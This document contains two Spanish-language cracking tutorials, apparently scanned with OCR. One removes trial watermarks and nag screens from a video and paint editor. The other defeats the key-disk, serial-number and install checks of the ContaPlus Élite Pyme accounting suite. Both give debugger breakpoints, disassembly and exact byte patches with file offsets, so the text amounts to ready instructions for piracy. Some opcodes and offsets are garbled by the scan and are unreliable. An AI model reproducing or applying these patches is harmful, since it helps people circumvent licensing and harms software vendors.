2.- Unas X rojas censoras en el editor de dibujo y en el editor de video. 


Ademas existen 2 nags de entrada que nos recuerdan lo mísero de la existencia no registrada. 


a 
VA 


X CENSORAS EN EL EDITOR DE DIBUJO 


Bien, saltemos las nags por ahora y abramos el editor de dibujo vpaint. 


Pinchemos en File/New/OK y tendremos un bonito lienzo pa dibujar. Un par de brochazos cutres y pulsemos intro para ver la animación. 
Sale una horrenda y roja X censora que tapa nuestros estúpidos brochazos. Empezemos a pensar un poco.Como se podra dibujar una X 
en pantalla. Pos, inicialmente no se me ocurre nada. Bueno sí color crack, pero si lo utilizamos aparecemos en un nido de llamadas del 
API de Video, asi que lo dejamos. Veamos que herramientas utiliza aplicando la lista muerta. Lo primero que encontramos en la lista de 
funciones importadas es: 


Import Module 001: MSVFW32.dll 


Addr:00086998 hint(0002) Name: DrawDibClose 

Addr:000869A8 hint(0003) Name: DrawDibDraw 

Addr:000869B6 hint(0007) Name: DrawDibOpen 

Esto se parece mucho a MocoSoft Video For Window 32 bits. Recordemos que estamos montando una animación, así que es lógico que 
usemos esta librería. Conozcamos algo acerca del formato DIB gentileza de la ayuda de M$ VC++ 


DrawDib Functions An application uses DrawDib functions to create and manage a DrawDib DC, display and update images on-screen, 
manipulate palettes, and to close the DrawDib DC when it's no longer needed. The DrawDib functions also include a timing function 
and a test function to determine display characteristics. 


Veamos un poco mas acerca de la funcion drawdib que es la que tiene mas pinta de ayudarnos: 


The DrawDibDraw function draws a DIB to the screen. 


BOOL DrawDibDraw( HDRAWDIB hdd, HDC hdc, int xDst, int yDst, int dxDst, int dyDst, LPBITMAPINFOHEADER 1lpbi, 
LPVOID lpBits, int xSrc, int ySrc, int dxSrc, int dySrc, UINT wFlags ); 


Asi pues con esto pinta en pantalla, pero ¿qué tenemos que buscar? 


Lancemos nuestro querido Sice cargando previamente el Load Expoorts la libreria MSVFW32.d1l Abramos el vpaint y antes de darle al 


intro pongamos un "bpx drawdibdraw". Y boom, aparecemos en MSVFW32!drawdibdraw con f12 regresamos al vpaint. A esta hora ya 
ha aparecido la jodida X censora pintada por drawdibdraw, como suponiamos. Aparecemos en: 


* Reference To: MSVFW32.DrawDibDraw, Ord:0003h 


:0046512E E879760000 Call 0046C7AC // Aqui se pinta la X censora */ 
:00465133 56 push esi 


* Reference To: MSVFW32.DrawDibClose, Ord:0002h 


:00465134 E86D760000 Call 0046C7A6  // Cerramos el dib 
:00465139 C745FCFFEFFEFFEF mov [ebp-04], FFEFFFEFEFF 

:00465140 E874000000 call 004651B9 

:00465145 B801000000 mov eax, 00000001 

:0046514A EB77 jmp 00465103 


Bien, ya sabemos donde se pinta la X, ahora existen 2 opciones: 


e Que la X se introduzca de forma incondicional ya que estamos en una version Trial del programa. 
e Que se introduzca de forma condicional 


La opción B es la más sencilla de rastrear, así que adelante con ella: 


Si rastreamos quien llama a estas sentencias observamos : 


:00465A84 ES5TETFFFF call 004651E0 // Si eax==0 no pintamos la X censora. 
:00465A89 85C0 test eax, eax 

:00465A8B 741A je 00465AA7 //Salto Condicional 

:00465A8D 8B442410 mov eax, dword ptr [esp+10] 

:00465A91 8B4E04 mov ecx, dword ptr [esi+04] 

:00465A94 50 push eax 

:00465A95 E8C6F5FFEF call 00465060 //Pinta la X 


Rastreando :004651E0 vemos: 


:004651E0 56 push esi 

:004651E1 57 push edi 

:004651E2 8BF9 mov edi, ecx 

:004651E4 85FF test edi, edi 

:004651E6 7427 je 0046520F 

:004651E8 837F2000 cmp dword ptr [edi+20], 00000000 //Flag de control de X 
:004651EC 7421 je 0046520F //Saltamos si no hay que pintar la X 
:004651EE 8B742410 mov esi, dword ptr [esp+10] 

:004651F2 56 push esi 

:004651F3 E848FDFFEF call 00464F40 

:004651F8 8B476C mov eax, dword ptr [edi+6C] 

:004651FB 8B4C240C mov ecx, dword ptr [esp+0C] 

:004651FF' 50 push eax 

:00465200 56 push esi 

:00465201 51 push ecx 

:00465202 8B4F78 mov ecx, dword ptr [edi+78] 

:00465205 E8E6020000 call 004654F0 

:0046520A 5F pop edi 

:0046520B 5E pop esi 

:0046520C C20800 ret 0008 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
| :004651E6(C), :004651EC (C) 


:0046520F 33C0 xor eax, eax //Flag activado para evitar las X 
:00465211 5F pop edi 

:00465212 5E pop esi 

:00465213 C20800 ret 0008 

Si cambiamos :004651E6 7427 je 0046520F 

por :004651E6 EB27 jmp 0046520F 


No aparece la X pero tampoco nuestros garabatos, asi que 
sigamos subiendo para ver que encontramos: 


:004392A3 E888F10100 call 00458430 //Asigna el flag. 

:004392A8 85C0 test eax, eax 

:004392AA 740C je 004392B8 //Saltamos el 32c1pbd.dib_MarkVideo???7?7 
:004392AC 8B07 mov eax, dword ptr [edi] 

:004392AE 50 push eax 


* Reference To: u32clpbd.dib_MarkVideo, Ord:0001h 


:004392AF FF15DC684800 Call dword ptr [004868DC] 11/2227? 
:004392B5 83C404 add esp, 00000004 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :004392AA(C) 

| 

:004392B8 8B75EC mov esi, dword ptr [ebp-14] 
:004392BB 8B07 mov eax, dword ptr [edi] 
:004392BD 83C608 add esi, 00000008 

:004392C0 50 push eax 

:004392C1 8B5508 mov edx, dword ptr [ebp+08] 
:004392C4 8BOE mov ecx, dword ptr [esi] 
:004392C6 51 push ecx 

:004392C7 52 push edx 

:004392C8 B908344800 mov ecx, 00483408 

:004392CD E89EC70200 call 00465A70 //Lamada para pintar la DIB 


Esto se parece mucho a lo que buscabamos, un salto condicional 
sobre una función que trabaja con DIB y con video. 


Miremos por 00458430 


:00458430 8B81CC010000 mov eax, dword ptr [ecx+000001CC] //Flag de control de X 
:00458436 85C0 test eax, eax 

:00458438 7403 jmp 0045843d 

:0045843A 33C0 xor eax, eax //Buen chico sin cruces en las espaldas 
:0045843C C3 ret 

:0045843D 8B8064010000 mov eax, dword ptr [eax+00000164] 

:00458443 2D15050000 sub eax, 00000515 

:00458448 83F801 cmp eax, 00000001 

:0045844B 1BCO sbb eax, eax //Asigna flag para pintar la X 
:0045844D F7D8 neg eax 

:0045844F C3 ret 


Si cambiamos 


:00458438 7403 jmp 0045843d 
Por :00458438 33C0 xor eax.eax (Offset 0x57838 en Vpaint.exe) 


Solucionado el tema, probémoslo y funciona a las mil maravillas. 


X CENSORAS EN EL EDITOR DE VIDEO 
Conociendo el precio del pescao, miremos si existe u32clpbd.dib_MarkVideo dentro de las funciones importadas por el veditor.exe. No 
hay suerte, así que pintan la X de forma diferente, pensemos, por que aquí es donde reside la diversión. 


¿Cómo narices pinta la X? 


Recordemos la función que se utiliza para pintar en pantalla MSVFW32.DrawDibDraw. 

Abramos el editor e insertemos un AVI al final de la secuencia poniendo un bpx drawdibdraw. 

La funcion se activa 2 veces antes de dibujar la jodida X en :00488C0E. Si subimos y buscamos saltos condicionales, no encontramos 
nada aprovechable, así que un poco de ZEN. 


La función DrawDibDraw usa un bitmap que es el que pinta en pantalla. este bitmap lo encontrmos como 7” parámetro de la función: 
LPVOID IpBits, 
TRAMPA PARA OSOS 


Insertemos un trozo de video al final de la secuencia para dejar varios segundos en blanco sólo para la X censora. 


En :00488C00 55 push ebp “//Encontramos el puntero a los bytes del bitmap. 


Si ponemos un bpx 00488C00 y guarreamos el las bytes del bitmap vemos 

que guarremos la X que dibujamos, así que estamos en el buen camino. 

Como la secuencia de video está al final, sólo hay secuencias en blanco con la X antes del verdadero video. 
El aspecto del bitmap es todo FF FF FF FF excepto cuando hay que pintar la X que cambia a 00 00 00 

La trampa esta servida pogamos un bpm XXXX W en algunos de los ceros y vemos quien escribe 


:0048B2DC C6430100 mov [ebx+01], 00 


Estamos en plena rutina de creación de la X censora. 
Esta rutina empieza en :0048B 18D y es llamada condicionalmete por 


:0048B17B 837E1000 cmp dword ptr [esi+10], 00000000 //Test flag. 
:0048B17F 740C je 0048B18D //Salta y pinta la X 


Si ponemos un bpx en 0048B17B y seguimos indagando, vemos que el flag es realmente [590ff0] 


Poniendo un bpm 590ff0 w aparecemos en: 


:00527130 A1E8235700 mov eax, dword ptr [005723E8] 

:00527135 8B8064010000 mov eax, dword ptr [eax+00000164] 

:0052713B 3D14050000 cmp eax, 00000514 //Si el flag maestro es 514 entra de forma normal 
:00527140 752B jne 0052716D 

:00527142 8B44240C mov eax, dword ptr [esp+0C] 

:00527146 8B4C2408 mov ecx, dword ptr [esp+08] 

:0052714A 8B542404 mov edx, dword ptr [esp+04] 


* Possible Reference to String Resource ID=00001: "VE" 


:0052714E C70001000000 mov dword ptr [eax], 00000001 
:00527154 8B442410 mov eax, dword ptr [esp+10] 


* Possible Reference to String Resource ID=00001: "VE" 


:00527158 C70101000000 mov dword ptr [ecx], 00000001 


* Possible Reference to String Resource ID=00001: "VE" 


:0052715E C70201000000 mov dword ptr [edx], 00000001 
:00527164 C70000000000 mov dword ptr [eax], 00000000 
:0052716A C21000 ret 0010 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :00527140(C) 

:0052716D 3D15050000 cmp eax, 00000515 //Flag maestro para entrar en forma trial. 
:00527172 752B jne 0052719F 

:00527174 8B44240C mov eax, dword ptr [esp+0C] 

:00527178 8B4C2408 mov ecx, dword ptr [esp+08] 

:0052717C 8B542404 mov edx, dword ptr [esp+04] 

* Possible Reference to String Resource ID=00001: "VE" 

:00527180 C70001000000 mov dword ptr [eax], 00000001 

:00527186 8B442410 mov eax, dword ptr [esp+10] 

* Possible Reference to String Resource ID=00001: "VE" 

:0052718A C70101000000 mov dword ptr [ecx], 0000000 

* Possible Reference to String Resource ID=00001: "VE" 

:00527190 C70201000000 mov dword ptr [edx], 0000000 

* Possible Reference to String Resource ID=00001: "VE" 

:00527196 C70001000000 mov dword ptr [eax], 0000000 //Actualiza el flag [590£f0] 
:0052719C €21000 ret 0010 


Asi pues, existe un flag maestro, si es 0x514 entramos de forma normal y registrada, 
y 0x515 de forma trial. El cambio es claro 


:00527140 752B jne 0052716D por :00527140 EBOO jmp 00527142 
(0x126540 offset en veditor.exe) 


Listo, una cruz menos en nuestra conciencia. 


NAGS Y OTRAS ESTUPIDECES 


El trabajo duro está hecho, no queda mas que eliminar un par de nags. 
La pista esta en nombres luminosos como u32cfg:ulcCheckLegality 
Basta cambiar en el ofsset 0x404 del fichero u32cfg: 6A 00 por EB 13 


Bueno, eso es todo, pero recuerda. 

Busca la fuente, busca a +ORC en la Red 
Hasta la próxima. 

estadoporcinoO hotmail.com 
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PD PARA EL PROGRAMADOR 


INTRODUCCIÓN 


Victima: CONTAPLUS ÉLITE PYME 
Site: www.gruposp.com 
HERRAMIENTAS: 


Desensamblador. Por ejemplo w32dasm 
Editor hexadecimal. Por ejemplo uedit 
Paciencia y Confianza. 


Saludos familia. Aprovecho los ratos para escribir algunas cosillas. 

En esta ocasión acometemos uns joyita con Discos llave, Números de serie,encriptación, 
descompresión en tiempo de ejecución y misterios insondables. 

Un dulce para pasar el rato. 


Llegó a mis manos una petición de crack. Normalmente la desestimo, a menos que la pida un 
amigo, me interese o favorezca mi entorno de trabajo. 

Es mejor enseñar a crakear que enseñar a llorar para suplicar. 

En fin, toda esa filosofía expuesta por +ORC y reescrita por E+P. Son las 8:00 de la mañana 
y me he pasado toda la noche crakeando. 

Si señor, hay pocos placeres comparables. 

Los crackers me entenderán perfectamente de lo que les hablo:-). 

El peluo maulla desesperao y la gorda duerme a mi lado. 

A veces la vida te sonríe y no sabes porqué.Aprovéchala antes de que cambie. 


En este entorno , nada se puede resistir... 


AL ATAQUEEEEEEE 


Miremos nuestro producto. Se trata de un clásico de la facturación española. Contaplus 
Pyme Elite Otoño 98 del 1-11-98 
Un paquete en formato CD que se compone de: 


ContaPlus 

FacturaPlus 

NominaPlus 

PersonalPlus 

Utilidades (Antivirus Norton, Antivirus Mcafee, Sidekick y PC Anywhere) 


La web la tenemos en Www.gruposp.com. 
Despendolemos un ratico por su web a ver a cuanto tienen el timo. 


Uhmm 2 millones de ventas y nuestro producto 165.000 pelas, !!! 
Precio especial !!!! 

Joer, pos si que, pa una urgencia, vamos. 

Se merecen que lo crackeen, si señor. 


PROTECCIONES ESPAÑOLAS 


A primera vista, el programa es español y por tanto la protección también. Conociendo los 
antecedentes de protecciones españolas, estimo que estará roto en 5 minutos. Sólo recuerdo 
una protección española cojonuda. Era de un catalán y se la había puesto a su programa de 
rompecabezas. Si sería buena que fue uno de los "coladores''para la +HCU con +ORC y 
+Fravia(a ver si se recupera pronto, leñe) 


PRIMERA APROXIMACION Y PRIMER ENFADO 


Empezamos mal, intentamos instalar el contaplus y nos pide un disquete llave. Joder, ¿no 
habían pasado al olvido esas protecciones basadas en discos llave?. ¿Es que no aprenden?. 
Los discos llave fueron desechados porque 

no eran fiables, se podían cascar en el trayecto de la fábrica al usuario y luego vete a reclamar 
al maestro armero una vez que has pagado el producto, eso sin contar 

el tiempo de espera del nuevo disquete, y que el que te manden no esté roto. 

Para colmo, estos discos se formatean a medida por lo que no se pueden 

copiar (en general) ni siquiera para sacar una triste copia de seguridad. 

Como veis, una mierda, y los del CONTAPUS dale que dale. 


OBJETIVOS 


Estan claros, cepillarse al CONTAPLUS y obviar el disco llave. 
Pero conseguiremos bastantes cositas más. 


SEGUNDA APROXIMACIÓN Y SEGUNDA OSTIA. LAS COSAS SE COMPLICAN 


Si intentamos instalar sin disco llave nos aparece una estúpida ventana: 
"Inserte disco llave, Por favor retire el disco actual y bla,bla,bla'' 

La ventanita tiene pinta de dialogbox, así que nos vamos al SoftIce y ponemos 
unas bonitas trampas para osos. 


bpx dialogbox 
bpx dialogboxparama 


Lanzamos al niño y el que pica es el bpx dialogboxparama. 

Con f12 aparece la ventana de error, pulsamos NO y caemos en kernel!alloc. 
Ostias que feo. F12 antes pa asomar el pescuezo en 

:10012739 dentro del proceso -GLC000x. (la x es variable). 


Ostias, que mierda es esta, ¿dónde está es fichero ese tan raro?. 

En el directorio del conta no, seguro. 

¿Pero entonces dónde?. Si buscamos el ficherito no está en el disco duro. 

Entonces, ¡por la madre de MITRA!, ¿que coño pasa?. 

Pensad una posible solución antes de pasar al siguiente párrafo, que os van a salir almorranas 
cerebrales. 


LA SOLUCIÓN A LA PELUA CUESTIÓN 


Pos si, seguro que ya lo habeis acertado :-) 

El puto fichero se crea en tiempo de ejecución y se borra antes salir. 

Por eso no aparece en el directorio de instalación ni en el disco duro al finalizar. 

Pero entonces, segunda e importante cuestión: 

¿como mangonearemos si se genera en tiempo de ejecución? 

Es vital poder toquetear para saltarse la protección. 

Así pues, relegamos el estudio del 

para centrarnos en como se puede modificar un fichero que se crea en tiempo de ejecución. 


MODIFICACIÓN DE FICHEROS CREADOS EN TIEMPO DE EJECUCIÓN 


Las variantes que se me ocuren de menos a más elegantes son: 


1 Entender como se crea el fichero y retocarlo antes de que se cree. 

2 Parchearlo en memoria una vez creado 

- mediante un parche en tiempo de ejecución. 

- Aplicando ingeniería inversa para localizar y redirigir un trozo de código 

inútil dentro del ejecutable y que parchee el fichero. 

3 Dejar que se cree en memoria pero redirigirlo a un fichero en disco ya retocado. 


Recuerdo cierta protección del mismo tipo en el Hotmetal 4.0. antes que los encerraran en la 
inutilidad del vbox. 


INTENTO SER UN TIO ELEGANTE, PERO NO ESTÚPIDO 


Pues eso, intento ser un tio elegante y opto por la primera opción y descubro lo siguiente: 


* Dentro del fichero instalar.exe del contaplus reside el famoso -GLCO000x. 

En tiempo de ejecución se lee un trozo del fichero instalar.exe, se marea un poco y se 
construye el nuevo fichero. 

El nombre se construye a partir de una cadena constante :-GLC %04x.tmp. 

Podeis abrir el fichero instalar.exe y cambiar el nombre por algo más decente. 

Tengo destripado y pasado a C el algoritmo que extrae del fichero instalar.exe los bytes, los 
marea un poco y los escribe en el -GLC%04x.tmp. 

Si quereis más datos del algoritmo mandadme un mail. 


* Me quedaba la duda de si el autor de la protección había encriptado, comprimido o 
encriptado/comprimido. 

La respuesta es sólo comprimido siguiendo un complicado algoritmo que tengo casi analizado. 
Asi pues sólo queda otra semana para crear un compresor (el descompresor ya lo tengo, está 
en el propio programa). 


* Como la cosa se complicaba, deseche esta vía y me fui a la opción 2. 
Pronto la desistimé porque no sabía cuantos parches tenía que aplicar. 


Así pués, me fui a la vía 3. Ya sé, ya sé, es la más cutre, pero rula :-) 


CAER EN LA CUENTA 


Concurrida audiencia, por si no os habeis dado cuenta, la protección es muy buena. 
RESPETAD AL PROGRAMADOR que se ha entretenido en comprimir sus datos 
y descomprimirlos en tiempo de ejecución. 

Buen trabajo BBYYMMAARRCCOOSS. 

Quizás no esté todo perdido dentro del panorama de programadores españoles. 
Aupa muchachos!!! 


OPCION 3 CAÑERA 


Lo primero es pillar una copia chachi del “GLC% 04x.tmp pa poder 

modificarla tranquilamente y después regirigir el programa para que cargue nuestra dll y no la que ha creado. 
Para ello, lanzamos el instalar y aparece la venta de error con "si" y "no". 

Nos vamos al explorador de Windows con la teclilla nueva con el logo del windoze 

(ostias, pero si sirve pa algo y to), o bien lo abrimos antes que el instalar y conmutamos con ALT+TAB. 
Estamos seguros que el fichero debe de existir porque aún no ha acabado el programa (nos da la opción de continuar 
si pusamos "'si''), 

Buscamos en el explorador los ficheros que empiezen por -GLC y bingo, 

lo tenemos en ciwindows. Con mucho cuidado lo copiamos y lo pegamos en un sitio seguro. 

Nuestra cena ya está en la red :-=). 

Para los descuidados como yo, habilitarle la opción de sólo lectura con el botón derecho 

del ratón y propiedades. Sino lo perderemos cuando lo utilizemos. 

Recordad quitarle lo de sólo lectura para parchearlo. 


Do quiera que un fichero se cargue en memoria y se ejecute en tiempo de ejecución este debe ser una dll. 

Ya sé, ya sé, no tiene extendión dll ni ná, pero no es necesario. 

Para que un fichero sea considerado dll basta con tener nombre y extensión, y la constante -GLC %04x.tmp lo 
cumple. 

Por tanto, instalar debe cargarlo como librería. Si lo desensamblamos, vemos que usa la función del api 
KERNEL32.LoadLibraryA y además sólo una vez. 


:004024F7 740A je 00402503 
:004024F9 E87E060000 call 00402B7C 
:004024FE E9BDO00000 jmp 004025C0 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :004024F7 (C) 


:00402503 8D85E8FEFFFF lea eax, dword ptr [ebp+FFFFFEES] 
:00402509 50 push eax; Nombre churro de la librería -GLC%04x.tmp 


* Reference To: KERNEL32.LoadLibraryA, Ord:0190h 


:0040250A FF1534304000 Call dword ptr [00403034] 


Ahora hay que aplicar un poco de ingeniería inversa para transformar y que cargue siempre nuestra librería retocada. Os ahorro el 
proceso mental y obtenemos después de verificar que nunca se pasa por 
:004024F9 (con un bpx por ejemplo) 


:004024F7 8D85E8FEFFFF lea eax, dword ptr [ebp+FFFFFEE8];Dirección del nombre de la dll a cargar 


:004024FD C700432E6100 mov dword ptr [eax], 00612E43 ¿Constante .a0 y aprovechamos la c inicial 
de [eax] nos queda c.a 

:00402503 8D85E8FEFFFF lea eax, dword ptr [ebp+FFFFFEES];Guardamos las modificaciones. 

:00402509 50 push eax 


* Reference To: KERNEL32.LoadLibraryA, Ord:0190h 


:0040250A FF1534304000 Call dword ptr [00403034] 


Con esto siempre se carga la librería 'c.a''. Así pues renombramos la -GLC %04x.tmp que habiamos pescado antes como ''c.a" . Ya sé, el 
nombre es un poco cutre, pero si no os gusta retocarlo vosotros. No se os olvide indicar que es de sólo lectura si no lo queréis perder. 


Si repetimos lo del bpx dialogboxparama aparecemos en el proceso C!text (nuestro fichero c.a). Vamos por el buen camino. To este rollo 
pa redirigir un puto fichero, la protección debe ser la ostia. Estoy ansioso :-) 


Resumiendo, buscamos en el instalar.exe 74 0A ES 7E 06 00 00 y lo encontramos en 0x18F7 y cambiamos por 8D 85 ES FE FF FF C7 00 
43 2E 61 00 


VUELTA A LA PROTECCIÓN 


Ya podemos mangonear tranquilos nuestro C.a. 

Ahora hay que localizar donde se llama al disco llave y neutralizarlo. 

Los accesos al disco se pueden hacer de forma cutre y a alto nivel con 'deviceiocontrol'' 

o bien usando las interrupciones a pelo. Como podeis sospechar, se han usado los deviceiocontrol. 
Si en el softlce ponemos un bpx deviceiocontrol aparecemos en una dll mu fea GLfxxxx.tmp. 
Esto suena al mismo truquillo de descompresión en tipo de ejecución. 

Si pusamos unas 20 veces f12 reaparecemos en nuestra querida c.a 


:10015244 FF24858E540110 jmp dword ptr [4*eax+1001548E] 

:1001524B FF550C call [ebp+0C] ¡Llamada a la feisima glfxxxx.tmp 
:1001524E E93C010000 jmp 1001538F 

:10015253 FF75B4 push [ebp-4C] 

:10015256 FF550C call [ebp+0C] ¡2% Llamada 


Os ahorro el trabajo y os comento como funciona el esquema de protección a este nivel. 
Se crean 2 dll en tiempo de ejecución en el mismo estilo que ya hemos comentado. 
Estas dll se encargan de todo el acceso al disco llave. 

Los parámetros a las dll se pasan (agarraos) en cadenas ascii. 

Basta con poner un bpx 1001524B y echar un vistazo a esi y edi. 

Obtendremos parámetros del tipo 

3HayDisco 

3Esdisco 

3Instalaciones 


ESTÚPIDO VELO 


Corramos un estúpido velo en esta parte de la protección, porque es la más patética. 
Baste decir dos cosas, para anular completamente al disco hay que parchear :1001524B. 
En :1001524B se comprueba que existe disco, que el disco tiene el formato adecuado, 

se leen el número de licencias . 

Si existe algún error devuelven en eax=0, sino devuelven eax=1 

Así pues cambiamos 


:10015244 FF24858E540110 jmp dword ptr [4*eax+1001548E] 

:1001524B FF550C Call [ebp+0C] 

:1001524E E93C010000 jmp 1001538F 

:10015253 FF75B4 push [ebp-4C] 

:10015256 FF550C call [ebp+0C] ¡2% Llamada 
Por 

:1001524B 33 CO xor eax,eax 

:1001524D 40 inc eax 

:1001524E E93C010000 jmp 1001538F 

:10015253 33 CO xor eax,eax 

:10015255 33 CO xor eax,eax 

:10015257 40 inc eax 

:10015257 90 nop 


Buscamos FF 24 85 8EÉ 54 01 10 en c.a y lo encontramos 

en 0x1464B donde ponemos 33 CO 40 E9 3C 01 00 00 33 CO 33 CO 40 90 

Con esto quedan fulminados los accesos a disco. 

Si seguimos adelante nos pide un número de serie que se puede obviar si parcheamos en 


:1001525E FF75B8 push [ebp-48] 
:10015261 FF75B4 push [ebp-4C] 
:10015264 FF550C call [ebp+0C]; eax=0 si todo va bien. 


:10015267 E923010000 jmp 1001538F 


por 


:1001525E 33C0 xor eax, eax 
:10015260 33C0 xor eax, eax 
:10015262 33C0 xor eax, eax 
:10015264 33C0 xor eax, eax 
:10015266 90 nop 

:10015267 E923010000 jmp 1001538F 


Si no parcheamos los push el programa casca. 

Resumiendo, buscamos en c.a ff 75 b8 ff 75 b4 ff 55 0C E9 23 01 00 00 

y lo encontramos en 0x1465E, cambiándolo por 33 c0 33 c0 33 c0 33 c0 90 

Cuando pida el serial podemos introducir cualquier churro numérico p.e: 111-1-696969-11 
En el nombre de la empresa y nombre del usuario introducimos más de dos caracteres. 


Curiosamente todas estas rutinas GLC de acceso a disco y check del serial, aparecen como 
una dll normal spptr.dil en el directorio de instalación. Para qué, mu sencillo, 

para deinstalar y eliminar una licencia del disco llave. 

En teoría hay un número límite de instalaciones, cada vez que se instala 

el programa se elimina una licencia del disco llave y cada vez que se desistala se añade una. 


¿ÉXITO? 

Si seguimos todos los pasos, la instalación finaliza correctamente . 

Ávidos lanzamos el programa y crash.''Aplicación instalada incorrectamente". 
¿En qué nos hemos equivocado?. Pensad un poco. 


SOLUCIONES VIABLES 


Seguro que habéis llegado a la misma conclusión que yo. 

Las rutinas de manejo de disco que hemos inutilizado, dejaban algun flag en algún sitio 
que indicara que el programa estaba bien instalado. 

Así pues hay quedan dos opciones: 


1 Saltar la comprobación en el programa principal. 
2 Activar ese flag. 


HORROR Y ESPANTO 


Seleccionando la opción 1 nos encontramos en un avispero. 

El progrma principal está hecho en CLIPPER. 

Qué horror, aún se siguen usando esas herramientas del demonio. 

Si queréis pasarlo realmente mál intendad, trazar un programa en clipper. 

El control se realiza por bucles 

de salto del tipo call[ax+4] que conducen a otros bucles de salto call [ebx+6], hasta el inifito. 
Todo está dirigido por tabla y en código de 16bits. 

Osea nada de usar la potencia de los registros de 32 bits. 

Una montaña de mierda, como podreis observar. 

Nada recomendabe ni saludable. 

Optamos por la opción 2. Para eso llamamos a nuestro amigo y le pedimos que nos comprima 
el CONTAPLUS (bien instalado) en 

disquetes para compararlo con el que tenemos. Busque las diferencias. 


EL MISTERIO INSONDABLE 


Si descomprimimos el CONTAPLUS bien instalado en nuestro disco duro nos llevamos 
una desagradable sorpresa. ''Aplicación mal instalada". 

Joder, que coño pasa, pero si lo hemos copiado de uno que estaba bien instalado. 

A ver, a lo mejor accede al registro del sistema buscando algo raro. 

Lanzamos el regmon y vemos que la aplicación accede pero busca cosas nada importantes. 
Podréis pensar, bueno quizás busque un fichero extraño que no hayamos copiado. 
Lanzamos en filemon y sólo accede al win.ini fuera de su directorio. 

Miramos el win.ini y no vemos nada sospechoso. 


¿To esto está mu bien, pero que coño mira para saber que no está bien instalado? 


Este es el misterio insondable que me ha tenido la noche en velo y que me ha hecho disfrutar 
como un enano cabezón. Pero hay más, si copiamos el directorio de instalación en el disco duro 
donde se instaló originalmnte, el programa deja de funcionar. 

Quedan eliminados los flags en el registro del sistema y el acceso a ficheros raros, 

como ya suponíamos. Y el colmo, si copiamos y pegamos el ejecutable en el directorio de 
instalación del disco duro original de instalación el jodio programa funciona con el 

ejecutable original, pero no con la copia. ¿es mágia? 

¿hay una explicación razonable o estamos ante un expediente X ? 


Pensad el problema antes de mirad la solución, es apasionante. 
Centraos en lo extraño que es que funcione con el ejecutable original 
y no con la copia, cuando son los mismos ficheros. 


EL EXPEDIENTE X DESVIRGADO 


Lo más curioso de todo es que el programa funciona con el ejecutable original, pero no con la copia. 

En principio, esto no tiene sentido, a menos, claro está que exista una diferencia entre el original y el copiado. 
Exactamente, la fecha de creación. 

Para comprobarlo retrasé el reloj del windoze hasta la fecha hora y minuto en el que se había 

construido el ejecutable original. 


En ese preciso momento realizé una copia del origial y BINGO, la copia del ejecutable funcionaba. 

Ya hemos encontrado el flag, pero hace falta saber donde se guarda. 

En el registro del sistema no, porque no realiza ninguna operación extraña. 

Puede guardarlo en algún campo de la base de datos , osea en los fichero dbf. Para eliminar esta opción copie todos los 
ficheros 

(excepto el ejecutable) de nuestro CUENTAPLUS al directorio original, y seguia funcionando. 

En conclusión, el flag está dentro del propio ejecutable. 

¡Para comprobarlo, comparé el ejecutable original y el nuestro y he aquí las diferencias : 


FileSize: 2FA780h 
DD 2F2726h 
DB C7h 
DB 7Fh 
DD 2F2727h 
DB A2h 
DB Clh 
DD 2F272Dh 
DB 9Dh 
DB 3Dh 
DD 2F272Eh 
DB 54h 
[DB 79h 


Cambian 4 posiciones de memoria de un ejecutable a otro. 
Así pues una de las rutinas de acceso a disco que hemos 


desabilitado introduce en el ejecutable final la fecha de creación. 
Para más inri, esta fecha está encriptada y la llave de la desencriptación es BBYYMMAARRCCOOSS. 


Estos programadores nuncan aprenderán a ser humildes, los muy jodidos. 
Si cazamos las dll de disco que hemos anulado 

(copiar y pegar como ya vimos) y desensamblamos, observamos que 

se utiliza una bonita función: 

DosDateTimeToFileTime function converts MS-DOS date and time 
values to a 64-bit file time. 


BOOL DosDateTimeToFileTime ( 


WORD wFatDate, // 16-bit MS-DOS date 
WORD wFatTime, // 16-bit MS-DOS time 
LPFILETIME 1pFileTime // address of buffer for 64-bit file time 


y; 


Ponemos un bpx DosDateTimeToFileTime y lanzamos el contaplus. EUREKA, aparecemos en spptr.dll, un par de £12 más y volvemos a 
al ejecutable original. No os aburriré indicando como localizar la rutina de comprobación del flag (ya somos mayorcitos), doy 
directamente el parche: 


Cambiamos 

:10001545 8D542428 lea edx, dword ptr [esp+28] 

:10001549 51 push ecx ; BBYYMMAARRCCOOSS 
:1000154A 52 push edx 

Por 

:10001545 8D542428 lea edx, dword ptr [esp+28] 

:10001549 51 push ecx ; BBYYMMAARRCCOOSS 
:1000154A 51 push ecx ; BBYYMMAARRCCOOSS 


Buscamos en spptr.dll 8d 54 24 28 51 52 lo encontramos en 0x154A y lo cambiamos por 51 Listo y a disfrutar. 
Ya es hora de volver con la gorda y el peluo para tomar una cerveza. 


JUGUETEANDO 


*Existe una forma alternativa de corregir el problema de aplicación mal instalada. Si cogemos un dbf cualquiera del 
directorio /emp y lo copiamos con el nombre menumode.dbf , entramos en la aplicación pero en versión demostrativa, 
sin copias de seguridad y sin algunas opciones más. 


* Para convertir las copias de seguridad a la versión profesional, cambiad el nombre del fichero /emp/versione.dbf por 
/emp/versionp.dbf y /emp/menuwine.dbf /emp/menuwin.dbf . 

Esto provoca un pequeño error al mirar el "Acerca de'' en el CONTAPLUS, pero no tiene mayor importancia. 
Sospecho que con una poyada de estas más podemos pasar del CONTAPLUS élite al profesional, pero no he dado con 
la tecla. 


* Podemos copiar impunemente el directorio del CUENTAPLUS de un disco duro a otro sin necesidad de reinstalar. 


* Este mismo proceso es aplicable al NOMINAPLUS y FACTURAPLUS y el resto del paquete y muy probablemente 
al resto de productos de la empresa SP. El TVPPLUS está cascado (por lo menos en el cd) por lo que no se ha podido 
probar y el PersonalPlus no necesita retoques. PAra el resto de componenetes del paquete, simplemente se parchea el 
instalar.exe, y se copia el c.a del CONTAPLUS y se comienza la instalación. Una vez instalado, se copia el spptr.dll del 
contaplus en el directorio apropiado para cada producto (NOMINAPLUS: /exe) (FACTURAPLUS: /exe) 


* Para pasar una version demostrativa (o educativa) a versión élite, basta con aplicar el parche al spprt.dll y borrar el 
fichro /emp/menumode.dbf 


PD PARA EL PROGRAMADOR 


Querido Marco: 


Has construido una buena protección. 

He estado tentado de guardarme el crack por respeto. 

Pero lo que me decidió fue la decepción de ver como usabas Clipper y tu forma relajada de 
acceder al disco mediante deviceiocontrol. 

